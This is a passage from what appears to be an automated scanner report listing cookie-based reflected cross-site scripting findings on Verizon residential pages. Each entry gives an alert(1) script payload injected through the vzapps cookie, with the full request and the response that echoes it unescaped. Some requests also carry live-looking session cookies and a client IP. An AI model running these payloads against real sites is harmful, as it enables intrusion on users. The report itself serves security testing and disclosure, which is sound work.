Cookie: Source=CHSI; vzapps=STATE=TX8e5cb<script>alert(1)</script>29788bcdb3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110654
Expires: Sat, 20 Nov 2010 00:12:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX8e5cb<script>alert(1)</script>29788bcdb3c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8E5CB<SCRIPT>ALERT(1)</SCRIPT>29788BCDB3C </DIV>
...[SNIP]...

3.176. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 323cd'><script>alert(1)</script>db7eded9442 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX323cd'><script>alert(1)</script>db7eded9442; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129776
Expires: Sat, 20 Nov 2010 00:13:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX323cd'><script>alert(1)</script>db7eded9442; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX323CD'><SCRIPT>ALERT(1)</SCRIPT>DB7EDED9442 ' />
...[SNIP]...

3.177. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a1439<script>alert(1)</script>7afc59f4fcb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa1439<script>alert(1)</script>7afc59f4fcb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129772
Expires: Sat, 20 Nov 2010 00:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=TXa1439<script>alert(1)</script>7afc59f4fcb; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA1439<SCRIPT>ALERT(1)</SCRIPT>7AFC59F4FCB </DIV>
...[SNIP]...

3.178. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3eca3<script>alert(1)</script>d981b509d0a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX3eca3<script>alert(1)</script>d981b509d0a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77952
Expires: Sat, 20 Nov 2010 00:11:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX3eca3<script>alert(1)</script>d981b509d0a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3ECA3<SCRIPT>ALERT(1)</SCRIPT>D981B509D0A </DIV>
...[SNIP]...

3.179. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6db83'><script>alert(1)</script>29aa0ccd992 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6db83'><script>alert(1)</script>29aa0ccd992; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 00:11:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX6db83'><script>alert(1)</script>29aa0ccd992; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6DB83'><SCRIPT>ALERT(1)</SCRIPT>29AA0CCD992 ' />
...[SNIP]...

3.180. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload f4176<script>alert(1)</script>334615d8942 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXf4176<script>alert(1)</script>334615d8942; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71893
Expires: Sat, 20 Nov 2010 00:13:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf4176<script>alert(1)</script>334615d8942; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXF4176<SCRIPT>ALERT(1)</SCRIPT>334615D8942 </DIV>
...[SNIP]...

3.181. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cfc4'><script>alert(1)</script>fd78a1ef0ca was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70302
Expires: Sat, 20 Nov 2010 00:12:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4CFC4'><SCRIPT>ALERT(1)</SCRIPT>FD78A1EF0CA ' />
...[SNIP]...

3.182. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b82d'><script>alert(1)</script>f8ced5a7994 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5b82d'><script>alert(1)</script>f8ced5a7994; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 03:14:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5b82d'><script>alert(1)</script>f8ced5a7994; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5B82D'><SCRIPT>ALERT(1)</SCRIPT>F8CED5A7994 ' />
...[SNIP]...

3.183. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4abd8<script>alert(1)</script>d0d4bb3410c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX4abd8<script>alert(1)</script>d0d4bb3410c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; 